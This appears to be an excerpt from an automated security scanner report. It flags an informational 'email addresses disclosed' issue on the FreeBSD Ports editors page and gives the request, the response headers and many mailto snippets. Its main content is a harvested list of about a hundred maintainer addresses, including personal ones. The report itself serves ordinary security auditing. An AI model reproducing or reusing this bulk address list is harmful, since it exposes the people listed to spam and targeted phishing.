<A HREF="mailto:wen@FreeBSD.org">wen@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:douglas@douglasthrift.net">douglas@douglasthrift.net</A>
...[SNIP]...
<A HREF="mailto:wen@FreeBSD.org">wen@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:admin@lissyara.su">admin@lissyara.su</A>
...[SNIP]...
<A HREF="mailto:demon@FreeBSD.org">demon@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ache@FreeBSD.org">ache@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:marck@FreeBSD.org">marck@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pankov_p@mail.ru">pankov_p@mail.ru</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:c-s@c-s.li">c-s@c-s.li</A>
...[SNIP]...
<A HREF="mailto:ijliao@FreeBSD.org">ijliao@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ache@FreeBSD.org">ache@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stb@lassitu.de">stb@lassitu.de</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obonilla@galileo.edu">obonilla@galileo.edu</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:delphus@gmail.com">delphus@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...

24.311. http://www.freebsd.org/ports/editors.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/ports/editors.html

Issue detail

The following email addresses were disclosed in the response:

acm@FreeBSD.org
admin@mjbrune.org
aldis@bsdroot.lv
amdmi3@FreeBSD.org
andrewb@cs.cmu.edu
ant@monitor.deis.unical.it
ar@null.lv
arundel@FreeBSD.org
ashish@FreeBSD.org
bilbo@hobbiton.org
buganini@gmail.com
c.petrik.sosa@gmail.com
citycat4@ngs.ru
cm@therek.net
culot@FreeBSD.org
cyberbotx@cyberbotx.com
danfe@FreeBSD.org
darcsis@gmail.com
davide.italiano@gmail.com
deischen@freebsd.org
delphij@FreeBSD.org
dereckson@gmail.com
dhn@FreeBSD.org
dinoex@FreeBSD.org
dougb@FreeBSD.org
dryice@dryice.name
ele@pop17.odn.ne.jp
exile@chamber.ee
fernan@iib.unsam.edu.ar
freebsd-eclipse@FreeBSD.org
gahr@FreeBSD.org
garga@FreeBSD.org
gerrit.beine@gmx.de
giacomomariani@yahoo.it
ginga-freebsd@ginganet.org
gj@FreeBSD.org
gnome@FreeBSD.org
hrs@FreeBSD.org
itetcu@FreeBSD.org
jadawin@FreeBSD.org
janos.mohacsi@bsd.hu
jille@quis.cx
jimmy@mammothcheese.ca
jjuanino@gmail.com
joerg@FreeBSD.org
johans@FreeBSD.org
joseph@randomnetworks.com
jupengfei@gmail.com
kamikaze@bsdforen.de
kde@FreeBSD.org
kevlo@FreeBSD.org
laddassm@gmail.com
lewiz@compsoc.man.ac.uk
lme@FreeBSD.org
lx@FreeBSD.org
lx@redundancy.redundancy.org
makc@FreeBSD.org
markus@FreeBSD.org
martymac@FreeBSD.org
mi@aldan.algebra.com
mich@FreeBSD.org
mike@mikelockwood.com
miwi@FreeBSD.org
mono@FreeBSD.org
mva@FreeBSD.org
mwm@mired.org
nakaji@jp.freebsd.org
nivit@FreeBSD.org
nobutaka@FreeBSD.org
nokubi@ff.iij4u.or.jp
novel@FreeBSD.org
obrien@FreeBSD.org
olgeni@FreeBSD.org
oliver@FreeBSD.org
openoffice@FreeBSD.org
pav@FreeBSD.org
peter@FreeBSD.org
ports@FreeBSD.org
ports@eitanadler.com
question+fbsdports@closedsrc.org
radek@raadradd.com
rafan@FreeBSD.org
rfarmer@predatorlabs.net
rodrigo@bebik.net
sahil@FreeBSD.org
saper@SAPER.INFO
sarumaru@jp.FreeBSD.org
sbrabez@gmail.com
simon@FreeBSD.org
stas@FreeBSD.org
sylvio@FreeBSD.org
thierry@FreeBSD.org
toasty@dragondata.com
trebestie@gmail.com
ume@FreeBSD.org
vd@FreeBSD.org
vmagerya@gmail.com
wenheping@gmail.com

Request

GET /ports/editors.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "904355811"
Last-Modified: Sun, 23 Jan 2011 02:29:30 GMT
Content-Length: 1577445
Connection: close
Date: Mon, 24 Jan 2011 16:16:34 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: Editors</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text
...[SNIP]...
<A HREF="mailto:lx@redundancy.redundancy.org">lx@redundancy.redundancy.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mwm@mired.org">mwm@mired.org</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rfarmer@predatorlabs.net">rfarmer@predatorlabs.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mich@FreeBSD.org">mich@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mono@FreeBSD.org">mono@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lme@FreeBSD.org">lme@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:joerg@FreeBSD.org">joerg@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vd@FreeBSD.org">vd@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:amdmi3@FreeBSD.org">amdmi3@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:giacomomariani@yahoo.it">giacomomariani@yahoo.it</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sarumaru@jp.FreeBSD.org">sarumaru@jp.FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pav@FreeBSD.org">pav@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:janos.mohacsi@bsd.hu">janos.mohacsi@bsd.hu</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lewiz@compsoc.man.ac.uk">lewiz@compsoc.man.ac.uk</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:c.petrik.sosa@gmail.com">c.petrik.sosa@gmail.com</A>
...[SNIP]...
<A HREF="mailto:jimmy@mammothcheese.ca">jimmy@mammothcheese.ca</A>
...[SNIP]...
<A HREF="mailto:dryice@dryice.name">dryice@dryice.name</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:joseph@randomnetworks.com">joseph@randomnetworks.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kamikaze@bsdforen.de">kamikaze@bsdforen.de</A>
...[SNIP]...
<A HREF="mailto:gerrit.beine@gmx.de">gerrit.beine@gmx.de</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-eclipse@FreeBSD.org">freebsd-eclipse@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ashish@FreeBSD.org">ashish@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ashish@FreeBSD.org">ashish@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ashish@FreeBSD.org">ashish@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ashish@FreeBSD.org">ashish@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:andrewb@cs.cmu.edu">andrewb@cs.cmu.edu</A>
...[SNIP]...
<A HREF="mailto:ashish@FreeBSD.org">ashish@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:wenheping@gmail.com">wenheping@gmail.com</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ar@null.lv">ar@null.lv</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sbrabez@gmail.com">sbrabez@gmail.com</A>
...[SNIP]...
<A HREF="mailto:novel@FreeBSD.org">novel@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jupengfei@gmail.com">jupengfei@gmail.com</A>
...[SNIP]...
<A HREF="mailto:jadawin@FreeBSD.org">jadawin@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:peter@FreeBSD.org">peter@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:amdmi3@FreeBSD.org">amdmi3@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mva@FreeBSD.org">mva@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ume@FreeBSD.org">ume@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nakaji@jp.freebsd.org">nakaji@jp.freebsd.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ele@pop17.odn.ne.jp">ele@pop17.odn.ne.jp</A>
...[SNIP]...
<A HREF="mailto:ginga-freebsd@ginganet.org">ginga-freebsd@ginganet.org</A>
...[SNIP]...
<A HREF="mailto:ginga-freebsd@ginganet.org">ginga-freebsd@ginganet.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nokubi@ff.iij4u.or.jp">nokubi@ff.iij4u.or.jp</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fernan@iib.unsam.edu.ar">fernan@iib.unsam.edu.ar</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:question+fbsdports@closedsrc.org">question+fbsdports@closedsrc.org</A>
...[SNIP]...
<A HREF="mailto:question+fbsdports@closedsrc.org">question+fbsdports@closedsrc.org</A>
...[SNIP]...
<A HREF="mailto:vd@FreeBSD.org">vd@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:toasty@dragondata.com">toasty@dragondata.com</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:simon@FreeBSD.org">simon@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:markus@FreeBSD.org">markus@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:makc@FreeBSD.org">makc@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:laddassm@gmail.com">laddassm@gmail.com</A>
...[SNIP]...
<A HREF="mailto:laddassm@gmail.com">laddassm@gmail.com</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dereckson@gmail.com">dereckson@gmail.com</A>
...[SNIP]...
<A HREF="mailto:kevlo@FreeBSD.org">kevlo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:radek@raadradd.com">radek@raadradd.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:aldis@bsdroot.lv">aldis@bsdroot.lv</A>
...[SNIP]...
<A HREF="mailto:aldis@bsdroot.lv">aldis@bsdroot.lv</A>
...[SNIP]...
<A HREF="mailto:delphij@FreeBSD.org">delphij@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:darcsis@gmail.com">darcsis@gmail.com</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@eitanadler.com">ports@eitanadler.com</A>
...[SNIP]...
<A HREF="mailto:ports@eitanadler.com">ports@eitanadler.com</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:deischen@freebsd.org">deischen@freebsd.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rodrigo@bebik.net">rodrigo@bebik.net</A>
...[SNIP]...
<A HREF="mailto:openoffice@FreeBSD.org">openoffice@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:openoffice@FreeBSD.org">openoffice@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:openoffice@FreeBSD.org">openoffice@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:openoffice@FreeBSD.org">openoffice@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:openoffice@FreeBSD.org">openoffice@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:cm@therek.net">cm@therek.net</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kamikaze@bsdforen.de">kamikaze@bsdforen.de</A>
...[SNIP]...
<A HREF="mailto:dougb@FreeBSD.org">dougb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dhn@FreeBSD.org">dhn@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bilbo@hobbiton.org">bilbo@hobbiton.org</A>
...[SNIP]...
<A HREF="mailto:arundel@FreeBSD.org">arundel@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:cyberbotx@cyberbotx.com">cyberbotx@cyberbotx.com</A>
...[SNIP]...
<A HREF="mailto:pav@FreeBSD.org">pav@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:exile@chamber.ee">exile@chamber.ee</A>
...[SNIP]...
